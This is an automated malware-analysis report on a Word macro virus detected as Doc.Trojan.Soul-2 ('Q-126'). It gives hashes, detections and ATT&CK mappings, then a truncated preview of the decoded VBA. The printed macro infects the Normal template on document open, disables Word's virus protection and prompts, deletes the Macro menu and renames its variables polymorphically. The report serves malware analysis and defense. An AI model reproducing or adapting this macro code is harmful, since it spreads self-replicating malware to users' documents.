Doc.Trojan.Soul-2 Office (OLE) malware analysis — malicious · 845bfd0c578227b0

MALICIOUS

Office (OLE)

42.0 KB Created: 1997-09-17 11:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d241548c51025b1fe4e37ab1654903a1 SHA-1: 70102c9510f9dab1e33829fe148e2783d8b1967b SHA-256: 845bfd0c578227b01bbe779945e0edf5e5cd2682e68d58da0896def1f2adb0ba

180 Risk Score

Malware Insights

Doc.Trojan.Soul-2 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The critical ClamAV heuristic and the presence of a Document_Open VBA macro strongly indicate malicious intent. The macro attempts to write several values to the registry under 'HKEY_CURRENT_USER\Software\Q-126', suggesting an attempt to establish persistence or store configuration data. The macro also attempts to disable virus protection and remove macro security options.

Heuristics 3

ClamAV: Doc.Trojan.Soul-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Soul-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18861 bytes
SHA-256: `aacf42e138006b00fdff9e1f6e811a151e2222bf2dffa98a05a97f289f780cf0`
Detection ClamAV: Doc.Trojan.Soul-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim ôÙŒóÝþ™îíÎ(16, 2) As String Private Sub Document_New() Call Document_Open End Sub Private Sub Document_Open() Const ï§Åè»åÃÍŽïé = "ActiveDocument" On Error Resume Next Select Case ï§Åè»åÃÍŽïé Case "ActiveDocument" Set ˆ�¸í«¹°ÌÔ÷± = ActiveDocument.VBProject.VBComponents(1).CodeModule Set àÓœÂð£Šúá°ÅÇ = NormalTemplate.VBProject.VBComponents(1).CodeModule Case "NormalTemplate" Set àÓœÂð£Šúá°ÅÇ = ActiveDocument.VBProject.VBComponents(1).CodeModule Set ˆ�¸í«¹°ÌÔ÷± = NormalTemplate.VBProject.VBComponents(1).CodeModule If Day(Date) < 5 Then MsgBox "Q-126 infection", vbCritical, "Q-126" End If End Select SetAttr (NormalTemplate.Name), vbNormal CommandBars("Tools").Controls("Macro").Delete Options.VirusProtection = False Options.SaveNormalPrompt = False Options.ConfirmConversions = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Q-126", "me") = "Q-126 Virus" '÷±ÁÓž¾¼ãìóß�Â System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Q-126", "version") = "2.45" '÷±ÁÓž¾¼ãìóß�Â System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Q-126", "date") = "20/05/1999" '÷±ÁÓž¾¼ãìóß�Â System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Q-126", "Polymorph") = "(10..14)*126" '÷±ÁÓž¾¼ãìóß�Â System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Q-126", "author") = "Lord Soulblighter" '‡Á´û‚Ñ„‘¤‹×íï System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Q-126", "origin") = "Belgium" 'Chr If àÓœÂð£Šúá°ÅÇ.Countoflines > 100 Then Exit Sub Else Call Ï«š«õ–”»ÄË·ó(àÓœÂð£Šúá°ÅÇ, ˆ�¸í«¹°ÌÔ÷±) NormalTemplate.Save End If End Sub Private Sub Document_Close() End Sub Private Function Ï«š«õ–”»ÄË·ó(ByVal ˆà´¹ë²½ßø, ¯�Ïˆ…ÉœÆ¤®ì®) Dim »çà™ÎŒöí‹´ØŽ, ‡Á´û‚Ñ„‘¤‹×íï, ÷±ÁÓž¾¼ãìóß�Â As Integer Dim ‰Ûá•Úå‰þÕõµ As String ôÙŒóÝþ™îíÎ(1, 1) = "ôÙŒóÝþ™îíÎ" ôÙŒóÝþ™îíÎ(2, 1) = "ï§Åè»åÃÍŽïé" ôÙŒóÝþ™îíÎ(3, 1) = "ˆ�¸í«¹°ÌÔ÷±" ôÙŒóÝþ™îíÎ(4, 1) = "àÓœÂð£Šúá°ÅÇ" ôÙŒóÝþ™îíÎ(5, 1) = "Ï«š«õ–”»ÄË·ó" ôÙŒóÝþ™îíÎ(6, 1) = "ˆà´¹ë²½ßø" ôÙŒóÝþ™îíÎ(7, 1) = "¯�Ïˆ…ÉœÆ¤®ì®" ôÙŒóÝþ™îíÎ(8, 1) = "»çà™ÎŒöí‹´ØŽ" ôÙŒóÝþ™îíÎ(9, 1) = "‡Á´û‚Ñ„‘¤‹×íï" ôÙŒóÝþ™îíÎ(10, 1) = "÷±ÁÓž¾¼ãìóß�Â" ôÙŒóÝþ™îíÎ(11, 1) = "‰Ûá•Úå‰þÕõµ" ôÙŒóÝþ™îíÎ(12, 1) = "÷Ž¬ñ¢îªÖ–Öñ" ôÙŒóÝþ™îíÎ(13, 1) = "‘æŸö’ —³Ü‚•˜¯" ôÙŒóÝþ™îíÎ(14, 1) = "Ü¥ªùŠ¹Ì³�ôõñý" ôÙŒóÝþ™îíÎ(15, 1) = "éû¥æä�òùå£ê¶" ôÙŒóÝþ™îíÎ(16, 1) = "…è›„ì�¨ýüÝÝ" For ‡Á´û‚Ñ„‘¤‹×íï = 1 To 16 ôÙŒóÝþ™îíÎ(‡Á´û‚Ñ„‘¤‹×íï, 2) = ‘æŸö’ —³Ü‚•˜¯ Next ‡Á´û‚Ñ„‘¤‹×íï ‡Á´û‚Ñ„‘¤‹×íï = ˆà´¹ë²½ßø.Countoflines For »çà™ÎŒöí‹´ØŽ = 1 To ‡Á´û‚Ñ„‘¤‹×íï ˆà´¹ë²½ßø.…è›„ì�¨ýüÝÝLine »çà™ÎŒöí‹´ØŽ, "'" Next »çà™ÎŒöí‹´ØŽ ‡Á´û‚Ñ„‘¤‹×íï = ˆà´¹ë²½ßø.Countoflines For ÷±ÁÓž¾¼ãìóß�Â = 1 To ¯�Ïˆ…ÉœÆ¤®ì®.Countoflines ‰Ûá•Úå‰þÕõµ = ¯�Ïˆ…ÉœÆ¤®ì®.Lines(÷±ÁÓž¾¼ãìóß�Â, 1) Select Case ‰Ûá•Úå‰þÕõµ Case "Const ï§Åè»åÃÍŽïé = ""ActiveDocument""" ‰Ûá•Úå‰þÕõµ = "Const ï§Åè»åÃÍŽïé = ""NormalTemplate""" Case "Const ï§Åè»åÃÍŽïé = ""NormalTemplate""" ‰Ûá•Úå‰þÕõµ = "Const ï§Åè»åÃÍŽïé = ""ActiveDocument""" Case "'" GoTo éû¥æä�òùå£ê¶ End Select ˆà´¹ë²½ßø.InsertLines (‡Á´û‚Ñ„‘¤‹×íï + ÷±ÁÓž¾¼ãìóß�Â), …è›„ì�¨ýüÝÝ(‰Ûá•Úå‰þÕõµ) éû¥æä�òùå£ê¶: Next ÷±ÁÓž¾¼ãìóß�Â End Function Private Function …è›„ì�¨ýüÝÝ(Ü¥ªùŠ¹Ì³�ôõñý As String) Dim ‰Ûá•Úå‰þÕõµ As String Dim ÷Ž¬ñ¢îªÖ–Öñ As Boolean Dim ÷±ÁÓž¾¼ãìóß�Â, ‡Á´û‚Ñ„‘¤‹×íï As Integer For ‡Á´û‚Ñ„‘¤‹×íï = 1 To 16 ÷Ž¬ñ¢îªÖ–Öñ = True While ÷Ž¬ñ¢îªÖ–Öñ = True ÷Ž¬ñ¢îªÖ–Öñ = False For ÷±ÁÓž¾¼ãìóß�Â = 1 To (Len(Ü¥ªùŠ¹Ì³�ôõñý) - Len(ôÙŒóÝþ™îíÎ(‡Á´û‚Ñ„‘¤‹×íï, 1)) + 1) ‰Ûá•Úå‰þÕõµ = Mid(Ü¥ªùŠ¹Ì³�ôõñý, ÷±ÁÓž¾¼ãìóß�Â, Len(ôÙŒóÝþ™îíÎ(‡Á´û‚Ñ„‘¤‹×íï, 1))) If ‰Ûá•Úå‰þÕõµ = ôÙŒóÝþ™îíÎ(‡Á´û‚Ñ„‘¤‹×íï, 1) Then Ü¥ªùŠ¹Ì³�ôõñý = Left(Ü¥ªùŠ¹Ì³�ôõñý, ÷±ÁÓž¾¼ãìóß�Â - 1) & ôÙŒóÝþ™îíÎ(‡Á´û‚Ñ„‘¤‹×íï, 2) & Right(Ü¥ªùŠ¹Ì³�ôõñý, Len(Ü¥ªùŠ¹Ì³�ôõñý) - ÷±ÁÓž¾¼ ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.